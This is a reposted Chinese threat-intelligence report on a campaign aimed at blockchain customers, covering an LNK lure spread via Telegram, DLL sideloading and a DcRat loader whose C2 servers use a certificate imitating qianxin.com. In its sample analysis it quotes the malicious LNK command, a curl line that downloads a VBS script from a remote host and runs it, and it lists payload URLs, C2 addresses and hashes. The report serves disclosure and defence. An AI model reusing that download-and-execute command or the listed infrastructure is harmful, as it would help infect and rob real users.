仿冒奇安信证书!针对区块链客户的定向攻击活动

admin 2025年6月9日21:50:56评论25 views字数 2323阅读7分44秒阅读模式

概述

奇安信威胁情报中心和天擎猎鹰团队在终端运营过程中发现一伙未知的攻击者正在瞄准区块链行业的客户,恶意的压缩包为“转账截图2025.5.31.zip”,攻击者通过 Telagram 通信软件一对一进行传播,压缩包中为 Lnk 诱饵,双击后弹转账记录截图和释放白加黑组件,内存加载 DcRat,C2 带有自签名证书模仿qianxin.com。

仿冒奇安信证书!针对区块链客户的定向攻击活动

目前天擎“六合”高级威胁防御引擎已经可以实现对该 Lnk 的拦截,我们建议客户启用云查功能来发现未知威胁。

仿冒奇安信证书!针对区块链客户的定向攻击活动

样本分析

Lnk 文件指向的命令如下:

Cmd

C:WindowsSystem32cmd.exe   /c "curl -o C:UsersPublicaa.vbs   https://zl-web-images.oss-cn-shenzhen.aliyuncs.com/5C25D918A2314DA2AC8D3C704287E278.vbs   && start C:UsersPublicaa.vbs"

从远程服务器下载 vbs 脚本并启动,内容如下,带有中文注释,内容很像主流 GPT 自动生成的脚本代码:

仿冒奇安信证书!针对区块链客户的定向攻击活动

下载链接

文件路径

文件描述

https://zl-web-images.oss-cn-shenzhen.aliyuncs.com/5CF1D461CBF74FC4A2379ACCC8D45CA7.jpg

C:UsersPublicTokenPocket.jpg

诱饵图片

https://zl-web-images.oss-cn-shenzhen.aliyuncs.com/C16E6F8B5A614F74A597C3F055484754.txt

C:UsersPublicpythonw.exe

白文件,用于加载恶意DLL

https://zl-web-images.oss-cn-shenzhen.aliyuncs.com/2C36BCF9295640CFB21933AE822F5D75.res

C:UsersPublicpython310.dll

DLL组件,具有白签名

诱饵文件如下:

仿冒奇安信证书!针对区块链客户的定向攻击活动

释放的黑 dll 被加上了合法的数字签名 “Wuhoo Harmonious Reed Trade Co., Ltd.”

仿冒奇安信证书!针对区块链客户的定向攻击活动

恶意代码逻辑在 Py_Main 函数中,主要功能为在内存中加载 Shellcode。

仿冒奇安信证书!针对区块链客户的定向攻击活动

此 Shellcode 是一个 Loader,用于加载最终载荷 DCRat,C2:103.45.68.150:80

仿冒奇安信证书!针对区块链客户的定向攻击活动

与 C2 建立连接后,启动 Powershell 下载第二阶段的 Payload:

下载链接

文件路径

文件描述

https://zl-web-images.oss-cn-shenzhen.aliyuncs.com/27391835C6744B469E35C90327E527C8.txt

C:UsersPublicarphaCrashReport64.exe

白文件,用于加载恶意DLL

https://zl-web-images.oss-cn-shenzhen.aliyuncs.com/B999853FC3464384A7E5E5B9B71147E5.res

C:UsersPublicarphadump64.dll

DLL组件

https://zl-web-images.oss-cn-shenzhen.aliyuncs.com/540B0BAA3C5641EC9BF220021A16D230.ini

C:UsersPublicarphaCrashReport64.ini

加密的shellcode

https://zl-web-images.oss-cn-shenzhen.aliyuncs.com/15AD296C703E4D648CA98FED712C6C49.jpg

C:UsersPublicphoto_2024-12-07_00-24-16.jpg

诱饵图片

攻击者在第二阶段又弹出了一个诱饵图片用来展示转账完成:

仿冒奇安信证书!针对区块链客户的定向攻击活动

二阶段的白加黑组件功能是读取 arphaCrashReport64.ini 解密为 Shellcode,并将其加载到新创建的进程 rundll32.exe 中

仿冒奇安信证书!针对区块链客户的定向攻击活动

Shellcode 功能与之前相同,加载同一个载荷 DCRat,C2:38.46.13.170:8080

仿冒奇安信证书!针对区块链客户的定向攻击活动

扩线

其基础设施曾经搭建过比特币售卖网站,疑似用于诈骗。

仿冒奇安信证书!针对区块链客户的定向攻击活动

这类网站的活跃数不多,似乎由相同的模板搭建而来:

仿冒奇安信证书!针对区块链客户的定向攻击活动

VT 上观察到同源的样本,疑似通过 SEO 进行传播。

Md5

文件名

3cf9a8d8b7b68160d7523e60b0e43cd5

letsvpn-latest.exe

同样带有数字签名,目前已经被注销:

仿冒奇安信证书!针对区块链客户的定向攻击活动

沙箱识别为 asyncRat,C2:148.178.16.22:6666

总结

目前,基于奇安信威胁情报中心的威胁情报数据的全线产品,包括奇安信威胁情报平台(TIP)、天擎、天眼高级威胁检测系统、奇安信NGSOC、奇安信态势感知等,都已经支持对此类攻击的精确检测。

仿冒奇安信证书!针对区块链客户的定向攻击活动

IOC

FileHash-MD5:

05339834a0e7317505c74b58b19aaf0e

1b98984d2438d7a5d14b4f373b55603b

3cf9a8d8b7b68160d7523e60b0e43cd5

DcRat C2:

103.45.68.150:80|443

103.45.68.244:80|443

103.45.68.203:80|443

38.46.13.170:8080

Asyncat C2:

148.178.16.22:6666

Domain:

zl-web-images.oss-cn-shenzhen.aliyuncs.com

仿冒奇安信证书!针对区块链客户的定向攻击活动

点击阅读原文ALPHA 8.0

即刻助力威胁研判

原文始发于微信公众号(奇安信威胁情报中心):仿冒奇安信证书!针对区块链客户的定向攻击活动

免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2025年6月9日21:50:56
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   仿冒奇安信证书!针对区块链客户的定向攻击活动https://cn-sec.com/archives/4150424.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息